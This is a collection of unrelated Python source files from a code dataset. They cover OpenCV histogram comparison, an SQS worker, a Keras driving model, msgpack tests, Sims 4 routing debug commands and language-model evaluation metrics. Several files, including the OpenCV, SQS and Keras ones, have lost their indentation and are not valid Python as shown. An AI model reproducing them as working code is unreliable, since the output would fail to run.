https://docs.opencv.org/3.4/d8/dc8/tutorial_histogram_comparison.html
"""
import matplotlib.pyplot as plt
import argparse
import glob
import cv2
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True,
help="Path to the directory of images")
args = vars(ap.parse_args())
# initialize the index dictionary to store the image name
# and corresponding histograms and the images dictionary
# to store the images themselves
index = {}
images = {}
print(args["dataset"])
# loop over the image paths
for imagePath in glob.glob(args["dataset"] + "/*.jpeg"):
# extract the image filename (assumed to be unique) and
# load the image, updating the images dictionary
filename = imagePath[imagePath.rfind("/") + 1:]
image = cv2.imread(imagePath)
images[filename] = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# extract a 3D RGB color histogram from the image,
# using 8 bins per channel, normalize, and update
# the index
hist = cv2.calcHist([image], [0, 1, 2], None, [8, 8, 8],
[0, 256, 0, 256, 0, 256])
hist = cv2.normalize(hist, hist).flatten()
index[filename] = hist
# METHOD #1: UTILIZING OPENCV
# initialize OpenCV methods for histogram comparison
OPENCV_METHODS = (
("Correlation", cv2.HISTCMP_CORREL),
("Chi-Squared", cv2.HISTCMP_CHISQR),
("Intersection", cv2.HISTCMP_INTERSECT),
("Hellinger", cv2.HISTCMP_BHATTACHARYYA))
# loop over the comparison methods
for (methodName, method) in OPENCV_METHODS:
# initialize the results dictionary and the sort
# direction
results = {}
reverse = False
# if we are using the correlation or intersection
# method, then sort the results in reverse order
if methodName in ("Correlation", "Intersection"):
reverse = True
# loop over the index
for (k, hist) in index.items():
# compute the distance between the two histograms
# using the method and update the results dictionary
d = cv2.compareHist(index["90661.jpeg"], hist, method)
results[k] = d
# sort the results
results = sorted([(v, k) for (k, v) in results.items()], reverse=reverse)
# show the query image
fig = plt.figure("Query")
ax = fig.add_subplot(1, 1, 1)
ax.imshow(images["90661.jpeg"])
plt.axis("off")
# initialize the results figure
fig = plt.figure("Results: %s" % methodName)
fig.suptitle(methodName, fontsize=20)
# loop over the results
for (i, (v, k)) in enumerate(results):
# show the result
ax = fig.add_subplot(1, len(images), i + 1)
ax.set_title("%s: %.2f" % (k, v))
plt.imshow(images[k])
plt.axis("off")
# show the OpenCV methods
plt.show()
| StarcoderdataPython |
1621023 | <gh_stars>0
import time
import boto3
import json
import common
import os
QUEUE = os.environ.get("QUEUE")
client = boto3.client('sqs')
url = client.get_queue_url(QueueName=QUEUE).get('QueueUrl')
sqs = boto3.resource('sqs')
queue = sqs.Queue(url)
def getMessage(start):
msg = queue.receive_messages()
if msg:
msg = msg[0]
print("Retrieved queue message")
else:
print("Queue timed out")
return None
body = json.loads(msg.body)
msg.delete()
return body
def run():
"""Loop until message is received or queue times out and execute task"""
start = common.log(time.time(), "Getting from queue")
body = getMessage(start)
while body != None:
start = common.log(start, "Retrieved from queue")
common.exec(body)
body = getMessage(start)
if __name__ == '__main__':
run()
| StarcoderdataPython |
385876 | <reponame>sswarnakar/Behavioral-Cloning-Using-Udacity-Self-Driving-Car-Simulator
import tensorflow as tf
tf.python.control_flow_ops = tf
from keras.models import Sequential, model_from_json, load_model
from keras.optimizers import *
from keras.layers import Dense, Activation, Flatten, Dropout, Lambda, Cropping2D, ELU
from keras.layers.convolutional import Convolution2D
#from keras.layers.pooling import MaxPooling2D
#from keras.callbacks import EarlyStopping
from scipy.misc import imread, imsave
from sklearn.model_selection import train_test_split
import pandas as pd
import numpy as np
import random
#################################################################
def flipped(image, measurement):
return np.fliplr(image), -measurement
def get_image(i, data):
positions, corrections = ['left', 'center', 'right'], [.25, 0, -.25]
ID, r = data.index[i], random.choice([0, 1, 2])
measurement = data['steering'][ID] + corrections[r]
path = PATH + data[positions[r]][ID][1:]
if r == 1: path = PATH + data[positions[r]][ID]
image = imread(path)
if random.random() > 0.5:
image, measurement = flipped(image, measurement)
#print(i, ID)
return image, measurement
#################################################################
def generate_samples(data, batch_size):
while True:
SIZE = len(data)
data.sample(frac = 1)
for start in range(0, SIZE, batch_size):
images, measurements = [], []
for this_id in range(start, start + batch_size):
if this_id < SIZE:
image, measurement = get_image(this_id, data)
measurements.append(measurement)
images.append(image)
yield np.array(images), np.array(measurements)
#################################################################
model = Sequential()
model.add(Lambda(lambda x: (x / 127.5) - 1., input_shape = (160, 320, 3)))
model.add(Cropping2D(cropping=((70, 25), (0, 0)), input_shape = (160, 320, 3)))
model.add(Convolution2D(16, 8, 8, subsample = (4, 4), border_mode = "same"))
model.add(ELU())
model.add(Convolution2D(32, 5, 5, subsample = (2, 2), border_mode = "same"))
model.add(ELU())
model.add(Convolution2D(64, 5, 5, subsample = (2, 2), border_mode = "same"))
model.add(Flatten())
model.add(Dropout(.2))
model.add(ELU())
model.add(Dense(512))
model.add(Dropout(.5))
model.add(ELU())
model.add(Dense(1))
model.summary()
model.compile(optimizer = "adam", loss = "mse")
#################################################################
BATCH_SIZE = 64
NUMBER_OF_EPOCHS = 10
PATH = "data/"
CSV_FILE = "driving_log.csv"
DATA = pd.read_csv(PATH + CSV_FILE, usecols = [0, 1, 2, 3])
TRAINING_DATA, VALIDATION_DATA = train_test_split(DATA, test_size = 0.15)
TOTAL_TRAIN_DATA = len(TRAINING_DATA)
TOTAL_VALID_DATA = len(VALIDATION_DATA)
#################################################################
print('Training model...')
training_generator = generate_samples(TRAINING_DATA, batch_size = BATCH_SIZE)
validation_generator = generate_samples(VALIDATION_DATA, batch_size = BATCH_SIZE)
#early_stopping = EarlyStopping(monitor='val_loss', patience = 10, verbose = 1, mode = 'auto')
history_object = model.fit_generator(training_generator,
samples_per_epoch = TOTAL_TRAIN_DATA,
validation_data = validation_generator,
nb_val_samples = TOTAL_VALID_DATA,
nb_epoch = NUMBER_OF_EPOCHS,
#callbacks = [early_stopping],
verbose = 1)
#################################################################
print('Saving model...')
model.save("model.h5")
with open("model.json", "w") as json_file:
json_file.write(model.to_json())
print("Model Saved.")
| StarcoderdataPython |
3421701 | import pytest
from pathlib import Path
import datetime
from mock import patch
import numpy
from .._msgpack_api import read_msgpack, write_msgpack
from .._msgpack_api import msgpack_loads, msgpack_dumps
from .._msgpack_api import msgpack_encoders, msgpack_decoders
from .util import make_tempdir
def test_msgpack_dumps():
data = {"hello": "world", "test": 123}
expected = [b"\x82\xa5hello\xa5world\xa4test{", b"\x82\xa4test{\xa5hello\xa5world"]
msg = msgpack_dumps(data)
assert msg in expected
def test_msgpack_loads():
msg = b"\x82\xa5hello\xa5world\xa4test{"
data = msgpack_loads(msg)
assert len(data) == 2
assert data["hello"] == "world"
assert data["test"] == 123
def test_read_msgpack_file():
file_contents = b"\x81\xa5hello\xa5world"
with make_tempdir({"tmp.msg": file_contents}, mode="wb") as temp_dir:
file_path = temp_dir / "tmp.msg"
assert file_path.exists()
data = read_msgpack(file_path)
assert len(data) == 1
assert data["hello"] == "world"
def test_read_msgpack_file_invalid():
file_contents = b"\xa5hello\xa5world"
with make_tempdir({"tmp.msg": file_contents}, mode="wb") as temp_dir:
file_path = temp_dir / "tmp.msg"
assert file_path.exists()
with pytest.raises(ValueError):
read_msgpack(file_path)
def test_write_msgpack_file():
data = {"hello": "world", "test": 123}
expected = [b"\x82\xa5hello\xa5world\xa4test{", b"\x82\xa4test{\xa5hello\xa5world"]
with make_tempdir(mode="wb") as temp_dir:
file_path = temp_dir / "tmp.msg"
write_msgpack(file_path, data)
with Path(file_path).open("rb") as f:
assert f.read() in expected
@patch("srsly.msgpack._msgpack_numpy.np", None)
@patch("srsly.msgpack._msgpack_numpy.has_numpy", False)
def test_msgpack_without_numpy():
"""Test that msgpack works without numpy and raises correct errors (e.g.
when serializing datetime objects, the error should be msgpack's TypeError,
not a "'np' is not defined error")."""
with pytest.raises(TypeError):
msgpack_loads(msgpack_dumps(datetime.datetime.now()))
def test_msgpack_custom_encoder_decoder():
class CustomObject:
def __init__(self, value):
self.value = value
def serialize_obj(obj, chain=None):
if isinstance(obj, CustomObject):
return {"__custom__": obj.value}
return obj if chain is None else chain(obj)
def deserialize_obj(obj, chain=None):
if "__custom__" in obj:
return CustomObject(obj["__custom__"])
return obj if chain is None else chain(obj)
data = {"a": 123, "b": CustomObject({"foo": "bar"})}
with pytest.raises(TypeError):
msgpack_dumps(data)
# Register custom encoders/decoders to handle CustomObject
msgpack_encoders.register("custom_object", func=serialize_obj)
msgpack_decoders.register("custom_object", func=deserialize_obj)
bytes_data = msgpack_dumps(data)
new_data = msgpack_loads(bytes_data)
assert new_data["a"] == 123
assert isinstance(new_data["b"], CustomObject)
assert new_data["b"].value == {"foo": "bar"}
# Test that it also works with combinations of encoders/decoders (e.g. numpy)
data = {"a": numpy.zeros((1, 2, 3)), "b": CustomObject({"foo": "bar"})}
bytes_data = msgpack_dumps(data)
new_data = msgpack_loads(bytes_data)
assert isinstance(new_data["a"], numpy.ndarray)
assert isinstance(new_data["b"], CustomObject)
assert new_data["b"].value == {"foo": "bar"}
| StarcoderdataPython |
9692824 | # -*- coding: utf-8 -*-
"""
pip_services_runtime.errors.__init__
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Errors module initialization
:copyright: Digital Living Software Corp. 2015-2016, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
__all__ = [ \
'ErrorCategory', 'MicroserviceError', 'BadRequestError', 'BuildError', \
'CallError', 'ConfigError', 'ConflictError', 'ConnectionError', 'FileError', 'NotFoundError', \
'StateError', 'UnauthorizedError', 'UnsupportedError', 'UnknownError' \
]
from .ErrorCategory import ErrorCategory
from .MicroserviceError import MicroserviceError
from .BadRequestError import BadRequestError
from .BuildError import BuildError
from .CallError import CallError
from .ConfigError import ConfigError
from .ConflictError import ConflictError
from .ConnectionError import ConnectionError
from .FileError import FileError
from .NotFoundError import NotFoundError
from .StateError import StateError
from .UnauthorizedError import UnauthorizedError
from .UnsupportedError import UnsupportedError
from .UnknownError import UnknownError
| StarcoderdataPython |
1726236 | <gh_stars>1-10
"""
author: <NAME> (SSRL)
4/27/2017
""" | StarcoderdataPython |
1777882 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""""""
__author__ = 'leferrad'
from rl3.agent.feature import LBPFeatureTransformer
from rl3.agent.q_learning import QubeRegAgent, QubeTabularAgent, play_one
from rl3.environment.base import CubeEnvironment
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
reward_function = 'lbph' # simple or lbph
seed = 39# np.random.randint(0, 100)
print "Using seed=%i" % seed
ce = CubeEnvironment(n=3, seed=seed, whiteplastic=False, reward_function=reward_function)
ce.randomize(1)
#model = QubeTabularAgent(ce)
model = QubeRegAgent(ce, LBPFeatureTransformer())
# TODO: crear un mecanismo de attachments para el env (por ej, para monitorear algoritmos seguidos en cada iter)
gamma = 0.99
N = 3000
totalrewards = np.empty(N)
costs = np.empty(N)
for n in range(N):
eps = 1.0/np.sqrt(n+1)
totalreward = play_one(model, ce, eps, gamma, max_iters=100)
totalrewards[n] = totalreward
if n % 100 == 0:
print "episode:", n, "total reward:", totalreward, "eps:", eps, "avg reward (last 100):", \
totalrewards[max(0, n-100):(n+1)].mean()
# print "Algorithm followed: %s" % ce.actions_taken
#ce.render(flat=False)#.savefig("test%02d.png" % m, dpi=865 / c.N)
seed = np.random.randint(0, 100)
#print "Using seed=%i" % seed
ce = CubeEnvironment(n=3, seed=seed, whiteplastic=False, reward_function=reward_function)
ce.randomize(n/100 + 1)
print "avg reward for last 100 episodes:", totalrewards[-100:].mean()
print "total steps:", totalrewards.sum()
plt.plot(totalrewards)
plt.title("Rewards")
plt.show()
print "Done!" | StarcoderdataPython |
3565347 | <gh_stars>1-10
class A:
def doStuff(self, foo=True): return True
class B(A):
def doStuff(self, foo=True):
<selection>return A.doStuff(self, foo)</selection>
def otherMethod(self, foo, bar):
print foo, bar
| StarcoderdataPython |
3489594 | <filename>tests/ludwig/modules/test_encoder.py
# Copyright (c) 2019 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import random
import numpy as np
import pytest
import torch
from ludwig.data.dataset_synthesizer import build_vocab
from ludwig.encoders.base import Encoder
from ludwig.encoders.image_encoders import MLPMixerEncoder, ResNetEncoder, Stacked2DCNN
from ludwig.encoders.sequence_encoders import (
ParallelCNN,
SequenceEmbedEncoder,
StackedCNN,
StackedCNNRNN,
StackedParallelCNN,
StackedRNN,
)
DROPOUT = 0.5
DEVICE = "cuda" if torch.cuda.is_available() else "cpu"
def create_encoder(encoder_type, **encoder_kwargs):
encoder = encoder_type(**encoder_kwargs)
return encoder
def _generate_image(image_size):
return np.random.randint(0, 1, image_size).astype(np.float32)
def generate_images(image_size, num_images):
return np.array([_generate_image(image_size) for _ in range(num_images)])
def _generate_sentence(vocab_size, max_len):
sentence = np.zeros(max_len, dtype=np.int32)
random_length = random.randint(1, max_len)
sentence[:random_length] = [random.randint(0, vocab_size - 1) for _ in range(random_length)]
return sentence
def generate_random_sentences(num_sentences=10, max_len=10, vocab_size=10):
# Generate some random text
vocab = build_vocab(vocab_size)
text = np.array([_generate_sentence(vocab_size, max_len) for _ in range(num_sentences)])
return text, vocab
def encoder_test(
encoder,
input_data,
output_dtype,
output_shape,
output_data=None,
):
"""Helper method to test different kinds of encoders.
:param encoder: encoder object
:param input_data: data to encode
:param output_dtype: expected data type of the output (optional)
:param output_shape: expected shape of the encoder output (optional)
:param output_data: expected output data (optional)
:return: returns the encoder object for the caller to run extra checks
"""
encoder = encoder.to(DEVICE)
# Run the encoder
input_data = torch.from_numpy(input_data).to(DEVICE)
hidden = encoder(input_data)["encoder_output"]
# Check output shape and type
assert hidden.dtype == output_dtype
assert list(hidden.shape) == output_shape
if output_data is not None:
# todo the hidden output is actually a tensor. May need modification
assert np.allclose(hidden, output_data)
def test_image_encoders_resnet():
# Test the resnet encoder for images
encoder_kwargs = {"resnet_size": 8, "num_filters": 8, "output_size": 28, "dropout": DROPOUT}
image_size = (3, 10, 10)
output_shape = [1, 28]
input_image = generate_images(image_size, 1)
encoder = create_encoder(ResNetEncoder, height=image_size[1], width=image_size[2], **encoder_kwargs)
encoder_test(
encoder=encoder, input_data=input_image, output_dtype=torch.float32, output_shape=output_shape, output_data=None
)
output_shape = [5, 28]
input_images = generate_images(image_size, 5)
encoder_test(
encoder=encoder,
input_data=input_images,
output_dtype=torch.float32,
output_shape=output_shape,
output_data=None,
)
assert encoder is not None
assert encoder.resnet.__class__.__name__ == "ResNet"
assert list(encoder.resnet.output_shape) == [64, 3, 3]
assert len(encoder.fc_stack.layers) == 1
assert encoder.fc_stack.layers[0]["output_size"] == 28
assert encoder.fc_stack.layers[0]["activation"] == "relu"
def test_image_encoders_stacked_2dcnn():
# Test the resnet encoder for images
encoder_kwargs = {"num_conv_layers": 2, "num_filters": 16, "output_size": 28, "dropout": DROPOUT}
image_size = (3, 10, 10)
encoder = create_encoder(
Stacked2DCNN, num_channels=image_size[0], height=image_size[1], width=image_size[2], **encoder_kwargs
)
assert encoder is not None
assert encoder.conv_stack_2d is not None
assert list(encoder.conv_stack_2d.output_shape) == [32, 1, 1]
assert len(encoder.fc_stack.layers) == 1
assert encoder.conv_stack_2d.layers[0]["pool_kernel_size"] == 2
assert encoder.conv_stack_2d.layers[0]["stride"] == 1
assert encoder.conv_stack_2d.layers[0]["pool_stride"] == 2
assert encoder.conv_stack_2d.layers[0]["norm"] is None
assert encoder.conv_stack_2d.layers[0]["activation"] == "relu"
assert encoder.conv_stack_2d.layers[0]["dropout"] == 0
output_shape = [1, 28]
input_image = generate_images(image_size, 1)
encoder_test(
encoder=encoder, input_data=input_image, output_dtype=torch.float32, output_shape=output_shape, output_data=None
)
output_shape = [5, 28]
input_images = generate_images(image_size, 5)
encoder_test(
encoder=encoder,
input_data=input_images,
output_dtype=torch.float32,
output_shape=output_shape,
output_data=None,
)
def test_image_encoders_mlpmixer():
# Test the resnet encoder for images
encoder_kwargs = {
"patch_size": 5,
"embed_size": 8,
"token_size": 32,
"channel_dim": 16,
"num_layers": 2,
"dropout": DROPOUT,
}
image_size = (3, 10, 10)
output_shape = [1, 8]
input_image = generate_images(image_size, 1)
encoder = create_encoder(
MLPMixerEncoder, num_channels=image_size[0], height=image_size[1], width=image_size[2], **encoder_kwargs
)
encoder_test(
encoder=encoder, input_data=input_image, output_dtype=torch.float32, output_shape=output_shape, output_data=None
)
output_shape = [5, 8]
input_images = generate_images(image_size, 5)
encoder_test(
encoder=encoder,
input_data=input_images,
output_dtype=torch.float32,
output_shape=output_shape,
output_data=None,
)
assert encoder is not None
assert encoder.mlp_mixer.__class__.__name__ == "MLPMixer"
assert len(encoder.mlp_mixer.mixer_blocks) == 2
assert list(encoder.mlp_mixer.mixer_blocks[0].mlp1.output_shape) == [4]
assert encoder.mlp_mixer.patch_conv.__class__.__name__ == "Conv2d"
assert encoder.mlp_mixer.patch_conv.kernel_size == (5, 5)
def test_sequence_encoder_embed():
num_sentences = 4
embedding_size = 5
max_len = 6
# Generate data
text, vocab = generate_random_sentences(
num_sentences=num_sentences,
max_len=max_len,
)
encoder_kwargs = {"embedding_size": embedding_size, "vocab": vocab}
# Different values for reduce_output and the corresponding expected size
reduce_outputs = ["sum", None, "concat"]
output_shapes = [
[num_sentences, embedding_size],
[num_sentences, max_len, embedding_size],
[num_sentences, max_len * embedding_size],
]
for reduce_output, output_shape in zip(reduce_outputs, output_shapes):
for trainable in [True, False]:
encoder_kwargs["reduce_output"] = reduce_output
encoder_kwargs["embeddings_trainable"] = trainable
encoder_kwargs["dropout"] = DROPOUT
encoder = create_encoder(SequenceEmbedEncoder, max_sequence_length=max_len, **encoder_kwargs)
encoder_test(
encoder=encoder,
input_data=text,
output_dtype=torch.float32,
output_shape=output_shape,
output_data=None,
)
assert encoder.embed_sequence.dropout is not None
@pytest.mark.parametrize("encoder_type", [ParallelCNN, StackedCNN, StackedParallelCNN, StackedRNN, StackedCNNRNN])
@pytest.mark.parametrize("trainable", [True, False])
@pytest.mark.parametrize("reduce_output", ["sum", "max"])
def test_sequence_encoders(encoder_type: Encoder, trainable: bool, reduce_output: str):
num_sentences = 4
embedding_size = 5
max_len = 7
output_size = 3
# Generate data
text, vocab = generate_random_sentences(
num_sentences=num_sentences,
max_len=max_len,
)
encoder_kwargs = {
"embedding_size": embedding_size,
"vocab": vocab,
"output_size": output_size,
"num_fc_layers": 1,
"filter_size": 3,
"num_filters": 8,
"state_size": output_size,
}
# todo figure out the output size for parallel 1d conv
output_shape = [num_sentences, output_size]
encoder_kwargs["embeddings_trainable"] = trainable
encoder_kwargs["dropout"] = DROPOUT
encoder_kwargs["dropout"] = DROPOUT
encoder_kwargs["recurrent_dropout"] = DROPOUT
encoder_kwargs["fc_dropout"] = DROPOUT
encoder_kwargs["reduce_output"] = reduce_output
encoder = create_encoder(encoder_type, max_sequence_length=max_len, **encoder_kwargs)
encoder_test(
encoder=encoder, input_data=text, output_dtype=torch.float32, output_shape=output_shape, output_data=None
)
assert isinstance(encoder, encoder_type)
| StarcoderdataPython |
1731140 | from _math import Vector3
from timeit import itertools
from elements import GeneratorElement
from interactions.constraints import Circle, Constraint, create_constraint_set
from interactions.utils.routing import PlanRoute, FollowPath
from objects.components.types import ROUTING_COMPONENT
from server_commands.argument_helpers import OptionalTargetParam, get_optional_target, TunableInstanceParam, find_substring_in_repr, extract_floats
from server_commands.visualization_commands import POLYGON_STR, POLYGON_END_PARAM
from sims4.commands import CommandType
from sims4.geometry import RestrictedPolygon
import debugvis
import element_utils
import postures
import routing
import services
import sims4.commands
@sims4.commands.Command('routing.debug.follow')
def routing_debug_follow(x:float=None, y:float=None, z:float=None, obj:OptionalTargetParam=None, _connection=None):
if x is None or y is None or z is None:
return False
obj = get_optional_target(obj, _connection=_connection)
if obj is None:
return False
routing_component = obj.get_component(ROUTING_COMPONENT)
if routing_component is None:
return False
def _do_route_gen(timeline):
location = routing.Location(Vector3(x, y, z), routing_surface=obj.routing_surface)
goal = routing.Goal(location)
routing_context = obj.get_routing_context()
route = routing.Route(obj.routing_location, (goal,), routing_context=routing_context)
plan_primitive = PlanRoute(route, obj)
result = yield from element_utils.run_child(timeline, plan_primitive)
if not result:
return result
yield
nodes = plan_primitive.path.nodes
if not (nodes and nodes.plan_success):
return False
yield
else:
follow_path_element = FollowPath(obj, plan_primitive.path)
result = yield from element_utils.run_child(timeline, follow_path_element)
if not result:
return result
yield
return True
yield
timeline = services.time_service().sim_timeline
timeline.schedule(GeneratorElement(_do_route_gen))
return True
@sims4.commands.Command('routing.debug.waypoints')
def routing_debug_waypoints(*waypoint_data, _connection=None):
obj = get_optional_target(None, _connection=_connection)
if obj is None:
return False
routing_component = obj.get_component(ROUTING_COMPONENT)
if routing_component is None:
return False
object_manager = services.object_manager()
waypoints = []
for (is_float, data_points) in itertools.groupby(waypoint_data, lambda d: '.' in d):
while True:
try:
if is_float:
position = Vector3(float(next(data_points)), float(next(data_points)), float(next(data_points)))
routing_surface = routing.SurfaceIdentifier(services.current_zone_id(), 0, routing.SurfaceType.SURFACETYPE_WORLD)
location = routing.Location(position, routing_surface=routing_surface)
else:
o = object_manager.get(int(next(data_points)))
if o is None:
continue
routing_surface = o.provided_routing_surface
if routing_surface is None:
continue
location = routing.Location(o.position, routing_surface=routing_surface)
waypoints.append((routing.Goal(location),))
except StopIteration:
break
def _do_route_gen(timeline):
routing_context = obj.get_routing_context()
route = routing.Route(obj.routing_location, waypoints[-1], waypoints=waypoints[:-1], routing_context=routing_context)
plan_primitive = PlanRoute(route, obj)
result = yield from element_utils.run_child(timeline, plan_primitive)
if not result:
return result
yield
nodes = plan_primitive.path.nodes
if not (nodes and nodes.plan_success):
return False
yield
else:
follow_path_element = FollowPath(obj, plan_primitive.path)
result = yield from element_utils.run_child(timeline, follow_path_element)
if not result:
return result
yield
return True
yield
timeline = services.time_service().sim_timeline
timeline.schedule(GeneratorElement(_do_route_gen))
return True
@sims4.commands.Command('routing.debug.generate_routing_goals_geometry', command_type=CommandType.DebugOnly)
def routing_debug_generate_routing_goals_from_geometry(*args, obj:OptionalTargetParam=None, _connection=None):
output = sims4.commands.Output(_connection)
obj = get_optional_target(obj, _connection=_connection)
if obj is None:
return False
routing_component = obj.get_component(ROUTING_COMPONENT)
if routing_component is None:
return False
total_string = ''.join(args)
polygon_strs = find_substring_in_repr(total_string, POLYGON_STR, POLYGON_END_PARAM)
if not polygon_strs:
output('No valid polygons. must start with {} and end with {}'.format(POLYGON_STR, POLYGON_END_PARAM))
return
constraints = []
routing_surface = routing.SurfaceIdentifier(services.current_zone_id(), 0, routing.SurfaceType.SURFACETYPE_OBJECT)
for poly_str in polygon_strs:
point_list = extract_floats(poly_str)
if not point_list or len(point_list) % 2 != 0:
output('Point list is not valid length. Too few or one too many.')
return
vertices = []
for index in range(0, len(point_list), 2):
vertices.append(sims4.math.Vector3(point_list[index], 0.0, point_list[index + 1]))
polygon = sims4.geometry.Polygon(vertices)
geometry = RestrictedPolygon(polygon, [])
constraints.append(Constraint(geometry=geometry, routing_surface=routing_surface))
constraint_set = create_constraint_set(constraints)
if not postures.posture_graph.enable_debug_goals_visualization:
sims4.commands.execute('debugvis.goals.enable', _connection)
handles = constraint_set.get_connectivity_handles(obj)
handles_str = 'Handles: {}'.format(len(handles))
sims4.commands.output(handles_str, _connection)
all_goals = []
for handle in handles:
goal_list = handle.get_goals()
goals_str = '\tGoals: {}'.format(len(goal_list))
sims4.commands.output(goals_str, _connection)
all_goals.extend(goal_list)
if postures.posture_graph.enable_debug_goals_visualization:
for constraint in constraints:
with debugvis.Context('goal_scoring', routing_surface=constraint.routing_surface) as layer:
for polygon in constraint.geometry.polygon:
layer.add_polygon(polygon, routing_surface=constraint.routing_surface)
for goal in all_goals:
position = goal.location.transform.translation
layer.add_point(position, routing_surface=constraint.routing_surface)
@sims4.commands.Command('routing.debug.generate_routing_goals_circle', command_type=CommandType.DebugOnly)
def routing_debug_generate_routing_goals(x:float=None, y:float=None, z:float=None, radius:int=None, obj:OptionalTargetParam=None, _connection=None):
if x is None or (y is None or z is None) or radius is None:
sims4.commands.output('Please enter 4 floats for x,y,z and radius', _connection)
return False
obj = get_optional_target(obj, _connection=_connection)
if obj is None:
return False
routing_component = obj.get_component(ROUTING_COMPONENT)
if routing_component is None:
return False
if not postures.posture_graph.enable_debug_goals_visualization:
sims4.commands.execute('debugvis.goals.enable', _connection)
position = Vector3(x, y, z)
routing_surface = routing.SurfaceIdentifier(services.current_zone_id(), 0, routing.SurfaceType.SURFACETYPE_WORLD)
constraint = Circle(position, radius, routing_surface)
handles = constraint.get_connectivity_handles(obj)
handles_str = 'Handles: {}'.format(len(handles))
sims4.commands.output(handles_str, _connection)
all_goals = []
for handle in handles:
goal_list = handle.get_goals()
goals_str = '\tGoals: {}'.format(len(goal_list))
sims4.commands.output(goals_str, _connection)
all_goals.extend(goal_list)
if postures.posture_graph.enable_debug_goals_visualization:
with debugvis.Context('goal_scoring', routing_surface=routing_surface) as layer:
for polygon in constraint.geometry.polygon:
layer.add_polygon(polygon, routing_surface=routing_surface)
for goal in all_goals:
position = goal.location.transform.translation
layer.add_point(position, routing_surface=routing_surface)
@sims4.commands.Command('routing.debug.set_behavior')
def routing_debug_set_behavior(object_routing_behavior:TunableInstanceParam(sims4.resources.Types.SNIPPET), obj:OptionalTargetParam=None, _connection=None):
if object_routing_behavior is None:
return False
obj = get_optional_target(obj)
if obj is None:
return False
routing_component = obj.get_component(ROUTING_COMPONENT)
if routing_component is None:
return False
timeline = services.time_service().sim_timeline
timeline.schedule(object_routing_behavior(obj))
return True
| StarcoderdataPython |
9633786 | <reponame>EvgenDEP1/fitness
from django.contrib.auth.forms import AuthenticationForm
from authapp.models import UserProfile
class MyAuthForm(AuthenticationForm):
class Meta:
model = UserProfile
fields = ('username', 'password') | StarcoderdataPython |
6424875 | <gh_stars>0
import logging
import sys
from typing import List, Optional, Set, Callable, Dict, Type
from langmodels.evaluation.definitions import EvaluationResult
from langmodels.evaluation.customization import TokenTypeSubset
from langmodels.model import TrainedModel
DEFAULT_N_MODEL_SUGGESTIONS = 100
logger = logging.getLogger(__name__)
def bin_entropy(model: TrainedModel, line: str, extension: str, append_eof: bool,
token_type_subsets: Optional[Set[TokenTypeSubset]] = None, max_context_allowed: int = sys.maxsize,
full_tokens: bool = True) \
-> Dict[TokenTypeSubset, EvaluationResult]:
"""
Changes the state of the model!
"""
token_type_subsets = token_type_subsets or {TokenTypeSubset.full_set()}
all_entropies, tokens, all_token_types, context_lengths = model.get_entropies_for_text(line, extension, full_tokens=full_tokens, append_eof=append_eof, max_context_allowed=max_context_allowed)
evaluation_results: Dict[TokenTypeSubset, EvaluationResult] = {}
for token_type_subset in token_type_subsets:
res = []
sum = 0.0
count = 0
for entropy, token_type in zip(all_entropies, all_token_types):
if token_type_subset.contains(token_type):
res.append(entropy)
sum += entropy
count += 1
else:
res.append(None)
if max_context_allowed < 1000:
of_context_length_cumul = [(0.0, 0)] * max_context_allowed
for entropy, token_type, context_length in zip(all_entropies, all_token_types, context_lengths):
if token_type_subset.contains(token_type):
if context_length is not None:
of_context_length_cumul[context_length] = (of_context_length_cumul[context_length][0] + entropy, of_context_length_cumul[context_length][1] + 1)
of_context_length = [(val / n if n != 0 else 0.0, n) for (val, n) in of_context_length_cumul]
else:
of_context_length = None
evaluation_results[token_type_subset] = EvaluationResult(tokens, list(map(lambda tt: tt.__name__, all_token_types)),
res, sum / count if count else 0., of_context_length)
return evaluation_results
def mrr(model: TrainedModel, line: str, extension: str, append_eof: bool,
token_type_subsets: Optional[Set[TokenTypeSubset]] = None) \
-> Dict[TokenTypeSubset, EvaluationResult]:
"""
Changes the state of the model!
"""
token_type_subsets = token_type_subsets or {TokenTypeSubset.full_set()}
evaluation_results: Dict[TokenTypeSubset, EvaluationResult] = {}
for token_type_subsets in token_type_subsets:
inverse_rank_sum = .0
count = 0
inverse_ranks: List[Optional[float]] = []
all_tokens: List[str] = []
all_token_types: List[str] = []
for predictions, prep_token, token_type in \
model.get_predictions_and_feed(line, extension,
n_suggestions=DEFAULT_N_MODEL_SUGGESTIONS,
append_eof=append_eof):
all_tokens.append(prep_token)
all_token_types.append(token_type.__name__)
predicted_tokens = list(map(lambda p: p[0], predictions))
if token_type_subsets.contains(token_type):
try:
rank = predicted_tokens.index(prep_token) + 1
inverse_rank = 1. / rank
except ValueError: # actual token is not in prediction list
inverse_rank = 0.
inverse_rank_sum += inverse_rank
inverse_ranks.append(inverse_rank)
count += 1
else:
inverse_ranks.append(None)
evaluation_results[token_type_subsets] = EvaluationResult(all_tokens, all_token_types, inverse_ranks, inverse_rank_sum / count if count else 1.)
return evaluation_results
Metric = Callable[[TrainedModel, List[str], str, bool, Optional[Set[TokenTypeSubset]], Dict[Type, float], int],
Dict[TokenTypeSubset, EvaluationResult]]
def entropy_to_probability(entropy: float) -> float:
"""
>>> entropy_to_probability(0.0)
1.0
>>> entropy_to_probability(1.0)
0.5
>>> entropy_to_probability(3.0)
0.125
>>> entropy_to_probability(100.0)
7.888609052210118e-31
"""
return 2 ** -entropy
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.